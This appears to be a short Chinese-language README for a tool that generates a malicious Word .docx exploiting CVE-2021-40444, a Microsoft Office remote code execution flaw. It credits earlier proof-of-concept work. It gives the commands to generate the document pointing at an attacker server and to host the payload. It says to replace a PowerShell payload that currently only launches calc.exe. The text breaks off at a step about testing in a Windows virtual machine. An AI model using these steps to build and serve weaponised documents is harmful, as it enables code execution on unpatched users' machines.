恶意 docx 生成器,用于利用(Microsoft Office Word 远程代码执行)漏洞
此脚本的创建基于 LockedByte 的 CVE-2021-40444 PoC 和 Tothi 的 writeup
首先修改 backup.html 并替换 powershell payload。目前只是使用 IEX('calc.exe') 弹出一个 calc.exe。
python3 exploit.py generate http://<SRV IP>

生成恶意 docx(将位于 out/)后,你可以启动服务器:
sudo python3 exploit.py host 80

最后在 Windows 虚拟机中尝试该 docx:
